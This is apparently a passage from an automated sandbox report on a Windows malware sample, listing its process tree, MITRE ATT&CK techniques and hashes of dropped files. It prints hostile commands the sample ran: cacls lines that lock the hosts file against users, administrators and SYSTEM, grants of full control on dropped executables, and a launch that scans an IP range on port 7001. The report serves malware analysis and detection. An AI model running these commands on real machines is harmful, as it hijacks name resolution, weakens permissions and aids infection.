C:\Windows\btlbpeceu\hnkiaiely\blitiliem.exeblitiliem.exe TCP 191.101.0.1 191.101.255.255 7001 512 /save3⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:2328 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵PID:100
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:1716
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵PID:1428
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:4504
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵PID:3332
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:4228
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵PID:1972
-
C:\Windows\SysWOW64\pujbqc.exeC:\Windows\SysWOW64\pujbqc.exe1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1748
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\ibimzzri\puelpci.exe /p everyone:F1⤵PID:2148
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵PID:1908
-
C:\Windows\system32\cacls.execacls C:\Windows\ibimzzri\puelpci.exe /p everyone:F2⤵PID:2164
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\irlfzpltl\dlbkbn.exe /p everyone:F1⤵PID:1216
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵PID:4740
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\irlfzpltl\dlbkbn.exe /p everyone:F2⤵PID:3556
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\puelpci.exe1⤵PID:4656
-
C:\Windows\ime\puelpci.exeC:\Windows\ime\puelpci.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4460
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\ibimzzri\puelpci.exe /p everyone:F1⤵PID:2660
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵PID:3888
-
C:\Windows\system32\cacls.execacls C:\Windows\ibimzzri\puelpci.exe /p everyone:F2⤵PID:2952
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\irlfzpltl\dlbkbn.exe /p everyone:F1⤵PID:4608
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵PID:4368
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\irlfzpltl\dlbkbn.exe /p everyone:F2⤵PID:3936
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\puelpci.exe1⤵PID:3256
-
C:\Windows\ime\puelpci.exeC:\Windows\ime\puelpci.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:464
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Impair Defenses
1Disable or Modify System Firewall
1Modify Registry
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
95KB
MD586316be34481c1ed5b792169312673fd
SHA16ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5
SHA25649656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918
SHA5123a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc
-
Filesize
275KB
MD54633b298d57014627831ccac89a2c50b
SHA1e5f449766722c5c25fa02b065d22a854b6a32a5b
SHA256b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9
SHA51229590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3
-
Filesize
44.9MB
MD562add902b59978fbbab58ed813c43664
SHA15a879a91ded35381a3457addd84231b87171f68f
SHA25641a8ed207841d32085c44b6b1b056f34ec7ea0e19f74cae5e07886d2a59d43b7
SHA5127aa5facf710a1691dd27e41a0e2256c0a247f3b99bc6eaf1f9294010a8cdccf07f02fbd0538f88f30715a8a8564218f350de07b54fa9f9cc1c5947b922af11ab
-
Filesize
4.3MB
MD5605417d8e9f88423a070362ab7c9cf76
SHA157dbeeffb4e1ad794531956579670e6769dc64ba
SHA256402d0e9f8d1cb154070c6e2e429f75c79e4b7599b85bd8d3a4390ff09f8853d3
SHA5127131f1a73acbd4ae24b7ed7f0d5c455a79172e42f9198b4a78280c16efb0d3968c235de4af9f203a252affba8cfba9a518807695964b46e0aa22e271fe2144c8
-
Filesize
3.5MB
MD5d85c8f970de6bce2d33810311a01e119
SHA1cede72d3d9f346cf7d7e96040b2984542bbfc7b2
SHA2562d08f2af4fe5d89bc11ed3732957bf4522ac3cc7477ea33a7df27b7640081c65
SHA51239898694f8c303e8cc67b9da0a753c22ea4eac218d352110c3e6b6374ca28ed5705c4a64d668a20a091df39d4b4426cf33649788af9a3bc1449330ad7f5b481c
-
Filesize
26.4MB
MD50be8acbec664909fadd1722429106dfd
SHA1a44b089c2a80a2a20531cc3f8f8d1b3590eef910
SHA25670568c8aadcf5760461d602c8007e4c255e7dc0e18c04213d4e524d3cdb7c460
SHA512975427c8883c0bfb1720595b8d239e63cea18594e87cac5b127ccc8ae9a1ffcd8505ee7f9a372ef581955947a41ffe7636b82da272df50c89e44bed51bc87a1c
-
Filesize
2.9MB
MD5665e52dd939035c8a54def621d511106
SHA196ed7fe58f8d3b7d9d2df4f0df52c97951040263
SHA256cbffdd6ee0266dfc9ce98c2ccea87673933c061f8abda4cc6e19170c9e4cb8e0
SHA512f45c1bdaa07abcb37399ac1f9ee0e3ac2faecd191d979533d6318b78db772d6853c2bca4401c8274cfffe080be360829af12b0ffb05f0990d85b71b58e2e005d
-
Filesize
7.5MB
MD5506833e697b2178bc395a68586b15f5e
SHA1824a01d8d2eb543022bb071f6b3432613152e38d
SHA256dc1ea52515def07b86b6b7107aedd8b66547d487a5ed49c46cd151f28f169c61
SHA5124d4cc31690da0d66b787f23b4cd464e5f477be244af75109c7d249d5efb3249d32ff217e12e9660a2195c028aa349632190b5cf7db65d0ce5271ea4dd40725bb
-
Filesize
814KB
MD505ad9ff48ca25e89fe3672b10b139d5a
SHA1a86d662799bb570d5ed9d42c09ba4cfd606a138a
SHA256ac34e82c8fc2cc543e41a66367dea78f2972636bfcc59cb46a7bbde61ac7cf3d
SHA51214aa14d2bf5de59d1731975854fa8fcc022b6859a09828689b8c2eadc47fbc51a3b8752e93f65917382a3930acd74845ef43c8613decad6afc58babc8a43ed13
-
Filesize
1.2MB
MD5076da81e9e38c0c8446c9870da016040
SHA14880a02b3221e1bf6fa40871051e175e00fe95e3
SHA25607db21e7d704fd1ef65c94099c02966e3c17e93ceb99fd17417ab86c357a37bf
SHA512ff077c0af8e8eb4cd031b09dbeb1c109338a59c380d5399a400cba52c9ad10053b0d273a9ba01cffaa5550946aa11c3274984151b33bb93e78a60b1649ab3789
-
Filesize
2.3MB
MD5885d6c4d5a6bf765f40688344a70ca9b
SHA1c6405310de54e341902d87d49739e65eee8a3e78
SHA256bd3b5be82873c75206bfbf9cfdbbf0fa927a7f0a7fa16e6a6bee713c58874000
SHA512d36db9635d094bcb7719098eaec7baee7326f771a42ee9e2a3039c3185326c62c798f4b55a45688472b135305a8f9575f5d5bc6fc31a7b6cb91d41a7d8f7e57d
-
Filesize
20.5MB
MD5fdbaa8f60df190aabeec32658b22e770
SHA19ce29d478471db27df515b72a12f5aa2e052ff74
SHA256160df10d4f06c36f0996eb48a93ea7e1b43a3e3e6b3f3965de13ec0e6f42909d
SHA512b80bc0987d1c23e19adbc92a4fc1d425cb5991ce32cc62cfbcc8de029beedbefaface9bc560191c525f4ea685fd93d10cf0a55a6e6104afedb2e17328f25edcf
-
Filesize
30.2MB
MD550c39c15c92222105f0a78dd17480ed4
SHA1ec17e7fa41342e8ef577635e455a8c1e76828467
SHA256f2701c8e5aab9a5ea954e81aef5fbc99f905bd7b64d153053cd16e39129e7a35
SHA512996ad9cab5aeeaadf5be97940ecb4e9163e3357286c9e19c7cc7797f1a7a247026a456e77e9efaef86ec1b464a6e6ae0f9329d309cb41b0ec87d82cb28f240aa
-
Filesize
8.8MB
MD54c625714e2e390a2cf5f82054113c108
SHA17139c54f9356d1b4b3cab62095093d8ce3abe7e5
SHA2568a2e4ed365ffad9626748413bfcc94ad2a5553576b624fd5eb4db69fa62aa3ad
SHA512760ff22224cf51fd00a503b323118c76655a749aa0609f6750bbb30f23afe33845b3146af5f66b7f9a3ca39b60d5bdf622ede40ba66984aa6b893095a3535f80
-
Filesize
1019KB
MD564e4c63a21ad9e2bc50abce3d54ebe06
SHA1e57678caa8acbe56661aa6f0ed97c2fd0961592b
SHA2566763540eb8def9a3cdc7fc3109d577561a9297d2ab6c65d95c226c6fecd50094
SHA51225f8e50e5bc6da9759a8aff69a2fc4ef99ca52c9898ed24806a2f01f8842c250026ad825e0980d2d9acb1ceb680fac941b73392bea43932bb13eb35b24d34bcf
-
Filesize
4.3MB
MD51fba393aee2e174c17eaa2ba26bd889e
SHA109f74226da717786f1a877695d4fcf4f21bcea5c
SHA25601c66cf85d930c397964371c238d81118074adf3176ac2c75740ef7bcede8fa6
SHA512bd10773827cafaf90277ec0b8f9d6ad5a8ef39de41038bf9ddbfa645e1a8844e2134ab74a4ac0790a417f16a1692e1fb5dcc59054b82f0777d2852921022f654
-
Filesize
693B
MD5f2d396833af4aea7b9afde89593ca56e
SHA108d8f699040d3ca94e9d46fc400e3feb4a18b96b
SHA256d6ae7c6275b7a9b81ae4a4662c9704f7a68d5943fcc4b8d035e53db708659b34
SHA5122f359d080c113d58a67f08cb44d9ab84b0dfd7392d6ddb56ca5d1b0e8aa37b984fac720e4373d4f23db967a3465fcf93cee66d7934d4211a22e1ebc640755f01
-
Filesize
126KB
MD5e8d45731654929413d79b3818d6a5011
SHA123579d9ca707d9e00eb62fa501e0a8016db63c7e
SHA256a26ae467f7b6f4bb23d117ca1e1795203821ca31ce6a765da9713698215ae9af
SHA512df6bcdc59be84290f9ecb9fa0703a3053498f49f63d695584ffe595a88c014f4acf4864e1be0adf74531f62ce695be66b28cfd1b98e527ab639483802b5a37a6
-
Filesize
343KB
MD52b4ac7b362261cb3f6f9583751708064
SHA1b93693b19ebc99da8a007fed1a45c01c5071fb7f
SHA256a5a0268c15e00692a08af62e99347f6e37ee189e9db3925ebf60835e67aa7d23
SHA512c154d2c6e809b0b48cc2529ea5745dc4fc3ddd82f8f9d0f7f827ff5590868c560d7bec42636cb61e27cc1c9b4ac2499d3657262826bbe0baa50f66b40e28b616
-
Filesize
11KB
MD52ae993a2ffec0c137eb51c8832691bcb
SHA198e0b37b7c14890f8a599f35678af5e9435906e1
SHA256681382f3134de5c6272a49dd13651c8c201b89c247b471191496e7335702fa59
SHA5122501371eb09c01746119305ba080f3b8c41e64535ff09cee4f51322530366d0bd5322ea5290a466356598027e6cda8ab360caef62dcaf560d630742e2dd9bcd9
-
Filesize
6KB
MD5b648c78981c02c434d6a04d4422a6198
SHA174d99eed1eae76c7f43454c01cdb7030e5772fc2
SHA2563e3d516d4f28948a474704d5dc9907dbe39e3b3f98e7299f536337278c59c5c9
SHA512219c88c0ef9fd6e3be34c56d8458443e695badd27861d74c486143306a94b8318e6593bf4da81421e88e4539b238557dd4fe1f5bedf3ecec59727917099e90d2
-
Filesize
72KB
MD5cbefa7108d0cf4186cdf3a82d6db80cd
SHA173aeaf73ddd694f99ccbcff13bd788bb77f223db
SHA2567c65ffc83dbbbd1ec932550ea765031af6e48c6b5b622fc2076c41b8abb0fcb9
SHA512b89b6d9c77c839d0d411d9abf2127b632547476c2272219d46ba12832d5a1dab98f4010738969e905e4d791b41596473397cf73db5da43ecab23486e33b0e1d1
-
Filesize
381KB
MD5fd5efccde59e94eec8bb2735aa577b2b
SHA151aaa248dc819d37f8b8e3213c5bdafc321a8412
SHA256441430308fa25ec04fd913666f5e0748fdb10743984656d55acc26542e5fff45
SHA51274a7eebdee9d25a306be83cb3568622ea9c1b557a8fbb86945331209bdc884e48113c3d01aac5347d88b8d2f786f8929aa6bb55d80516f3b4f9cc0f18362e8e3
-
Filesize
332KB
MD5ea774c81fe7b5d9708caa278cf3f3c68
SHA1fc09f3b838289271a0e744412f5f6f3d9cf26cee
SHA2564883500a1bdb7ca43749635749f6a0ec0750909743bde3a2bc1bfc09d088ca38
SHA5127cfde964c1c62759e3ba53c47495839e307ba0419d740fcacbeda1956dcee3b51b3cf39e6891120c72d0aae48e3ea1019c385eb5006061ced89f33b15faa8acb
-
Filesize
424KB
MD5e9c001647c67e12666f27f9984778ad6
SHA151961af0a52a2cc3ff2c4149f8d7011490051977
SHA2567ec51f4041f887ba1d4241054f3be8b5068291902bada033081eff7144ec6a6d
SHA51256f0cff114def2aeda0c2c8bd9b3abcacef906187a253ea4d943b3f1e1ca52c452d82851348883288467a8c9a09d014910c062325964bcfe9618d7b58056e1fe
-
Filesize
7.1MB
MD5ef260d683b993a91607945142f9f6f4d
SHA1ef5bd0107a79632acc4d3e9331d290ae1c176a64
SHA256f930d61afb7b5f0a8e67c3fdf1c544744644cf472027880561e25eff3b1e81be
SHA5123e8b7b6e75c3ca8d201d3dbe8a550e4f7a1b75bd688b2fae7a6942ab6d2aab5e69f001a9019bda1804095732fea5a1c5d22cffe0942e1e609e765b2d02876da5
-
Filesize
1KB
MD5c838e174298c403c2bbdf3cb4bdbb597
SHA170eeb7dfad9488f14351415800e67454e2b4b95b
SHA2561891edcf077aa8ed62393138f16e445ef4290a866bccdbb7e2d7529034a66e53
SHA512c53a52b74d19274c20dece44f46c5d9f37cd0ec28cf39cac8b26ba59712f789c14d1b10b7f5b0efdf7ce3211dda0107792cc42503faa82cb13ffae979d49d376